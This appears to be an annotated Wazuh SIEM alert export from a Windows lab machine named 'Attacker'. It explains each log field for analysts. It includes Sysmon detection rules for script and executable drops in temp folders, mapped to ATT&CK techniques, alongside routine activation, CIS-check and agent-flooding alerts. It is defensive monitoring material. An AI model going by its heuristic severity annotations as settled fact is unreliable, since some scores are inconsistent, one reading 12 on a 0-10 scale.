data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-17 16:37:58.354 ProcessGuid: {94294ddc-2e5b-6801-fa07-000000000e00} ProcessId: 12712 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_vmq431i2.0u4.ps1 CreationUtcTime: 2025-04-17 16:37:58.354 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-17 16:37:58.354
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-2e5b-6801-fa07-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_vmq431i2.0u4.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-17 16:37:58.354
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

License activation (slui.exe) failed.

🧠 What happened? License activation (slui.exe) failed.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:32:26.207+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:26.207+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  License activation (slui.exe) failed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60646
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533946.523838
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  8198
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:32:19.2047110Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2396
Incremental log record number – handy for timeline order.

data.win.system.processID:  1832
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  ERROR
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "License Activation (slui.exe) failed with the following error code: hr=0x80004005 Command-line arguments: RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  hr=0x80004005, RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.: Status changed from passed to 'not applicable'

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.: Status changed from passed to 'not applicable'

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:32:30.387+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:30.387+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.: Status changed from passed to 'not applicable'
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19012
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['1.1.2']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['5.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533950.526135
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  2137254061
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26001
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting defines how long a user can use their password before it expires. Values for this policy setting range from 0 to 999 days. If you set the value to 0, the password will never expire. Because attackers can crack passwords, the more frequently you change the password the less opportunity an attacker has to use a cracked password. However, the lower this value is set, the higher the potential for an increase in calls to help desk support due to users having to change their password or forgetting which password is current. The recommended state for this setting is 365 or fewer days, but not 0. Note: Password Policy settings (section 1.1) and Account Lockout Policy settings (section 1.2) must be applied via the Default Domain Policy GPO in order to be globally in effect on domain user accounts as their default behavior. If these settings are configured in another GPO, they will only affect local user accounts on the computers that receive the GPO. However, custom exceptions to the default password policy and account lockout policy rules for specific domain users and/or groups can be defined using Password Settings Objects (PSOs), which are completely separate from Group Policy and most easily configured using Active Directory Administrative Center.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  The longer a password exists the higher the likelihood that it will be compromised by a brute force attack, by an attacker gaining general knowledge about the user, or by the user sharing the password. Configuring the Maximum password age setting to 0 so that users are never required to change their passwords is a major security risk because that allows a compromised password to be used by the malicious user for as long as the valid user has authorized access.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to 365 or fewer days, but not 0: Computer Configuration\Policies\Windows Settings\Security Settings\Account Policies\Password Policy\Maximum password age
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  1.1.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  5.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['net.exe accounts']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  not applicable
PASS or FAIL. Red = needs fixing.

data.sca.check.reason:  Timeout overtaken running command 'net.exe accounts'
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.previous_result:  passed
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Agent event queue is 90% full.

🧠 What happened? Agent event queue is 90% full.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:38.985+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:38.985+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Agent event queue is 90% full.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  202
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['wazuh', 'agent_flooding']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533958.531609
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  wazuh: Agent buffer: '90%'.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.parent:  wazuh
Parent decoder used – for nested parsing.

decoder.name:  wazuh
Name of the Wazuh decoder that parsed this raw log.

data.level:  90%
Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.

location:  wazuh-agent
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Agent event queue is full. Events may be lost.

🧠 What happened? Agent event queue is full. Events may be lost.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:41.379+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:41.379+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Agent event queue is full. Events may be lost.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  203
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['wazuh', 'agent_flooding']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533961.531836
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  wazuh: Agent buffer: 'full'.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.parent:  wazuh
Parent decoder used – for nested parsing.

decoder.name:  wazuh
Name of the Wazuh decoder that parsed this raw log.

data.level:  full
Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.

location:  wazuh-agent
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Agent event queue is flooded. Check the agent configuration.

🧠 What happened? Agent event queue is flooded. Check the agent configuration.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:55.730+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:55.730+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Agent event queue is flooded. Check the agent configuration.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  204
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['wazuh', 'agent_flooding']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533975.532081
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  wazuh: Agent buffer: 'flooded'.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.parent:  wazuh
Parent decoder used – for nested parsing.

decoder.name:  wazuh
Name of the Wazuh decoder that parsed this raw log.

data.level:  flooded
Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.

location:  wazuh-agent
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  12
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Scripting file created under Windows Temp or User folder

🧠 What happened? Scripting file created under Windows Temp or User folder

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:33:01.048+0000 | 🧠 MITRE: ['Execution', 'Command and Control'] – ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] [T1059] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:01.048+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Scripting file created under Windows Temp or User folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92200
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059', 'T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution', 'Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Command and Scripting Interpreter', 'Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533981.532353
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:47:59.1079756Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  215891
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-17 16:47:59.099 ProcessGuid: {94294ddc-4855-6800-0605-000000000e00} ProcessId: 8224 Image: C:\WINDOWS\system32\taskhostw.exe TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\CL_Utility.ps1 CreationUtcTime: 2025-04-17 16:47:59.099 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-17 16:47:59.099
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-4855-6800-0605-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\taskhostw.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\CL_Utility.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-17 16:47:59.099
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  6
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:33:01.110+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:01.110+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533981.534988
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:47:59.1250326Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  215897
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-17 16:47:59.123 ProcessGuid: {94294ddc-4855-6800-0605-000000000e00} ProcessId: 8224 Image: C:\WINDOWS\system32\taskhostw.exe TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\DiagPackage.dll CreationUtcTime: 2025-04-17 16:47:59.123 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-17 16:47:59.123
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-4855-6800-0605-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\taskhostw.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\DiagPackage.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-17 16:47:59.123
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  6
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Scripting file created under Windows Temp or User folder

🧠 What happened? Scripting file created under Windows Temp or User folder

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:33:01.140+0000 | 🧠 MITRE: ['Execution', 'Command and Control'] – ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] [T1059] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:01.140+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Scripting file created under Windows Temp or User folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92200
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059', 'T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution', 'Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Command and Scripting Interpreter', 'Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533981.537612
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

